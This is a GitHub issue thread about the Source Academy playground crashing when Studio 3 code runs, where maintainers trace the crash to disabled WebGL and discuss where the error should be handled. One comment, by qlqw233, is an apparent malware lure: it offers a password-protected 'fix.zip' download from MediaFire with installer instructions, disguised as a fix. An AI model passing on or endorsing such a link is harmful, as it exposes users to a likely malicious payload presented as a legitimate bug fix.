### ISSUE TITLE
Attempt to run code in playground causes website to crash.

### ISSUE THREAD

**Issue by yockcheng** [source-academy/frontend#3030]
Attempt to run code in playground for Studio 3 In-Class Studio Sheet causes website to crash.

<img width="1440" alt="Code" src="https://github.com/user-attachments/assets/0caad212-f100-41a8-a290-1a10749782f4">

<img width="1440" alt="Error" src="https://github.com/user-attachments/assets/c8360b2b-0b72-427a-89d4-bd8793d1951c">

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by RichDom2185** [comment]
Not a bug. Please enable WebGL in the browser.

**Comment by martin-henz** [comment]
But should the frontend crash? Any way to check if webgl is enabled?

**Comment by RichDom2185** [comment]
> But should the frontend crash? Any way to check if webgl is enabled?

I don't think it should be handled by frontend. Should be handled by modules, since that's what's causing the render to fail

**Comment by RichDom2185** [comment]
i.e., the tab should render the error message
